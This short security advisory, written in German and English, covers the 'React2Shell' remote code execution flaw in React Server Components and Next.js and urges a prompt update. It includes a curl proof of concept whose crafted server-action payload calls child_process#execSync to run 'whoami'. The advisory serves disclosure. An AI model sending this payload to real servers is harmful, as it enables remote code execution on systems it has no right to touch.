React2Shell: Next.js und React Components Functions

Dezember 4, 2025

Es wurde eine kritische Sicherheitslücke in React Components bekannt, die ebenfalls Next.js betrifft. Die Schwachstelle befindet sich im Paket react-server-dom-webpack und und ermöglicht Angreifern die Ausführung von beliebigem Code direkt auf dem Server.

A vulnerability affects certain React packages1 for versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 and frameworks that use the affected packages, including Next.js 15.x and 16.x using the App Router.

https://github.com/advisories/GHSA-9qr9-h5gf-34mp

The problem: metadata[NAME] comes from user input (the HTTP request). An attacker can specify any module and export name, like child_process#execSync.

GitHub PoC

Proof of Concept:

curl -X POST http://localhost:3000 \
  -F '$ACTION_REF_0=' \
  -F '$ACTION_0:0={"id":"child_process#execSync","bound":["whoami"]}'

Wir empfehlen dringend, auf die aktuelle Version zu aktualisieren. Da bereits bekannt ist, wie die Sicherheitslücke ausgenutzt werden kann. Wir rechnen mit einer Vielzahl automatisierter Angriffe, deshalb ist ein zeitnahes Update von höchster Priorität.